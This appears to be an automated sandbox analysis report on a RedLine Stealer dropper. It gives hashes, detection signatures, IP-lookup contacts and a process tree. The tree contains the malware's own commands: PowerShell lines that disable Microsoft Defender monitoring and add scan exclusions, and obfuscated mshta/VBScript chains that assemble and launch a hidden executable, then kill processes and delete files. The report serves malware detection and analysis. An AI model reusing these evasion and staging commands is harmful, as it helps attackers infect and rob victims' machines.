Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
10043d28836f...9f.exe
windows7_x64
10043d28836f...9f.exe
windows10_x64
10096fc162ed...c8.exe
windows7_x64
10096fc162ed...c8.exe
windows10_x64
101ad787b5aa...62.exe
windows7_x64
101ad787b5aa...62.exe
windows10_x64
10258cbb13ac...bd.exe
windows7_x64
10258cbb13ac...bd.exe
windows10_x64
1025d79c1a50...7f.exe
windows7_x64
1025d79c1a50...7f.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows10_x64
10500e7e5c00...44.exe
windows7_x64
10500e7e5c00...44.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows10_x64
107dc7ca2414...84.exe
windows7_x64
107dc7ca2414...84.exe
windows10_x64
1096c9fde298...34.exe
windows7_x64
1096c9fde298...34.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows10_x64
10ca14b87b56...83.exe
windows7_x64
10ca14b87b56...83.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
8cbf31d825a...d2.exe
windows10_x64
10Analysis
-
max time kernel
34s -
max time network
170s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
08-11-2021 10:07
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win10-en-20211104
Behavioral task
behavioral9
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win7-en-20211104
Behavioral task
behavioral16
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win7-en-20211014
Behavioral task
behavioral22
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win10-en-20211104
Behavioral task
behavioral23
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211104
Behavioral task
behavioral24
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral26
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral28
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral29
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win7-en-20211104
Behavioral task
behavioral30
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral32
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211104
General
-
Target
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
-
Size
4.4MB
-
MD5
bfc2137972c74edea0f9791b94486e9b
-
SHA1
fd72e52406ce3f2ae5cfdb5dd8c7243f3ce31eb3
-
SHA256
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4
-
SHA512
9fcd3756f9888e2000b94caf0d803087497b87428c0bd641901d2e416411bc698d9ca3a7a00d3cd711b681f3c8b8921f2a478f0ec1f975bc36fde5cf16741e75
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2140 3040 rundll32.exe 80 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral25/memory/3012-251-0x000000000041B23E-mapping.dmp family_redline behavioral25/memory/3020-254-0x000000000041B242-mapping.dmp family_redline behavioral25/memory/2280-322-0x000000000041B23E-mapping.dmp family_redline -
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
resource yara_rule behavioral25/files/0x00050000000132ea-71.dat aspack_v212_v242 behavioral25/files/0x00050000000132ea-72.dat aspack_v212_v242 behavioral25/files/0x000600000001266b-73.dat aspack_v212_v242 behavioral25/files/0x00050000000132ee-78.dat aspack_v212_v242 behavioral25/files/0x00050000000132ee-77.dat aspack_v212_v242 behavioral25/files/0x000600000001266b-74.dat aspack_v212_v242 -
Executes dropped EXE 2 IoCs
pid Process 848 setup_installer.exe 1816 setup_install.exe -
Loads dropped DLL 17 IoCs
pid Process 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 848 setup_installer.exe 848 setup_installer.exe 848 setup_installer.exe 848 setup_installer.exe 848 setup_installer.exe 848 setup_installer.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1816 setup_install.exe 1912 cmd.exe 1912 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 78 ip-api.com 31 ipinfo.io 32 ipinfo.io 37 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2512 1816 WerFault.exe 29 -
Kills process with taskkill 2 IoCs
pid Process 2892 taskkill.exe 1072 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 584 wrote to memory of 848 584 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 28 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 848 wrote to memory of 1816 848 setup_installer.exe 29 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1536 1816 setup_install.exe 31 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1612 1816 setup_install.exe 32 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1912 1816 setup_install.exe 33 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1068 1816 setup_install.exe 34 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1728 1816 setup_install.exe 35 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1608 1816 setup_install.exe 36 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1816 wrote to memory of 1920 1816 setup_install.exe 37 PID 1912 wrote to memory of 1880 1912 cmd.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS053C6966\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue200ab8d408d.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue200ab8d408d.exeTue200ab8d408d.exe5⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue201d50e7015.exe4⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue201d50e7015.exeTue201d50e7015.exe5⤵PID:916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2082eedf21.exe /mixone4⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2082eedf21.exeTue2082eedf21.exe /mixone5⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue207c76c7f37.exe4⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue207c76c7f37.exeTue207c76c7f37.exe5⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue207c76c7f37.exeC:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue207c76c7f37.exe6⤵PID:3012
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20adee3c26d.exe4⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20adee3c26d.exeTue20adee3c26d.exe5⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20ea834764a6.exe4⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20ea834764a6.exeTue20ea834764a6.exe5⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20abd30733a17.exe4⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20abd30733a17.exeTue20abd30733a17.exe5⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20d8f1968de62f282.exe4⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20d8f1968de62f282.exeTue20d8f1968de62f282.exe5⤵PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20d8f1968de62f282.exe"C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20d8f1968de62f282.exe"5⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20c79bfdadc.exe4⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20c79bfdadc.exeTue20c79bfdadc.exe5⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20c79bfdadc.exeC:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20c79bfdadc.exe6⤵PID:2280
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2082ea84bd.exe4⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2082ea84bd.exeTue2082ea84bd.exe5⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2082ea84bd.exeC:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2082ea84bd.exe6⤵PID:3020
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue205724605816e79.exe4⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue205724605816e79.exeTue205724605816e79.exe5⤵PID:2056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2095db5b6bd7.exe4⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2095db5b6bd7.exeTue2095db5b6bd7.exe5⤵PID:2364
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 4924⤵
- Program crash
PID:2512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue203dd57461.exe4⤵PID:1116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue202dc71d1d41.exe4⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2076b72c2666aa9c.exe4⤵PID:1000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-II715.tmp\Tue201d50e7015.tmp"C:\Users\Admin\AppData\Local\Temp\is-II715.tmp\Tue201d50e7015.tmp" /SL5="$60126,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue201d50e7015.exe"1⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue201d50e7015.exe"C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue201d50e7015.exe" /SILENT2⤵PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue203dd57461.exeTue203dd57461.exe1⤵PID:2072
-
C:\Users\Admin\AppData\Roaming\1781669.exe"C:\Users\Admin\AppData\Roaming\1781669.exe"2⤵PID:2536
-
-
C:\Users\Admin\AppData\Roaming\1318885.exe"C:\Users\Admin\AppData\Roaming\1318885.exe"2⤵PID:2308
-
-
C:\Users\Admin\AppData\Roaming\2200567.exe"C:\Users\Admin\AppData\Roaming\2200567.exe"2⤵PID:2736
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCripT: ClOSE( CREatEobjeCt ( "WsCRIPt.sheLl" ). RuN ( "cMD.eXe /Q/c TyPe ""C:\Users\Admin\AppData\Roaming\2200567.exe"" >qYZE.eXe && sTaRt qYZE.eXE -ptCb5EYRlk5vz& IF """" == """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\2200567.exe"" ) do taskkill /F -im ""%~nXm"" " , 0,tRUe ) )3⤵PID:2480
-
-
-
C:\Users\Admin\AppData\Roaming\2111513.exe"C:\Users\Admin\AppData\Roaming\2111513.exe"2⤵PID:2756
-
-
C:\Users\Admin\AppData\Roaming\7621776.exe"C:\Users\Admin\AppData\Roaming\7621776.exe"2⤵PID:748
-
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue202dc71d1d41.exeTue202dc71d1d41.exe1⤵PID:1592
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20adee3c26d.exe"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20adee3c26d.exe"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )1⤵PID:2560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20adee3c26d.exe" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue20adee3c26d.exe") do taskkill /IM "%~nXY" -f2⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\_4SO.EXE..\_4SO.Exe /PZOIMJIYi~u3pALhs3⤵PID:2880
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )4⤵PID:2940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE") do taskkill /IM "%~nXY" -f5⤵PID:584
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT( "WSCRIPt.SHELL" ).RUn( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 ,tRue ) )4⤵PID:1124
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D&COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un+3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *5⤵PID:2888
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"6⤵PID:2108
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\WOYVBnm.96⤵PID:2252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "6⤵PID:2084
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Tue20adee3c26d.exe" -f3⤵
- Kills process with taskkill
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PHOKK.tmp\Tue201d50e7015.tmp"C:\Users\Admin\AppData\Local\Temp\is-PHOKK.tmp\Tue201d50e7015.tmp" /SL5="$6015A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue201d50e7015.exe" /SILENT1⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\7zS053C6966\Tue2076b72c2666aa9c.exeTue2076b72c2666aa9c.exe1⤵PID:1956
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"1⤵PID:1900
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:1868
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c TyPe "C:\Users\Admin\AppData\Roaming\2200567.exe" >qYZE.eXe&& sTaRt qYZE.eXE -ptCb5EYRlk5vz&IF ""== "" for %m IN ("C:\Users\Admin\AppData\Roaming\2200567.exe" ) do taskkill /F -im "%~nXm"1⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\qYZE.eXeqYZE.eXE -ptCb5EYRlk5vz2⤵PID:240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -im "2200567.exe"2⤵
- Kills process with taskkill
PID:1072
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2340
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2140